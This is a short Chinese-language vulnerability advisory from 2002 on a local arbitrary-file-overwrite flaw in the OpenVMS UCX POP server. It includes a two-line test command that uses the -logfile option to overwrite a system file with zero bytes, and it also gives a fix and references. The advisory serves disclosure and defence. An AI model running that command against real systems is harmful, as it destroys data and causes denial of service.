OpenVMS UCX POP Server任意文件修改漏洞发布时间:2002-09-28 更新时间:2002-09-28 严重程度:中 威胁程度:本地拒绝服务 错误类型:访问验证错误 利用方式:服务器模式 BUGTRAQ ID:5790 受影响系统 Compaq OpenVMS 5.3详细描述 UCX POP (Post Office Protocol)是OpenVMS使用POP服务程序。 其中存在漏洞可导致本地恶意用户修改系统上任意文件内容。使用-logfile命令选项可导致使用0字节覆盖系统任意文件内容。 测试代码 $ $ break_it :== $sys$system:ucx$pop_server.exe $ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE 解决方案 取消ucx$pop_server.exe的执行权限。 相关信息 "Mike Riley" <mike@akitanet.co.uk>. 参考:http://online.securityfocus.com/archive/1/293070 http://www.akita-security.co.uk/VMS/ucx_pop_server.txt |
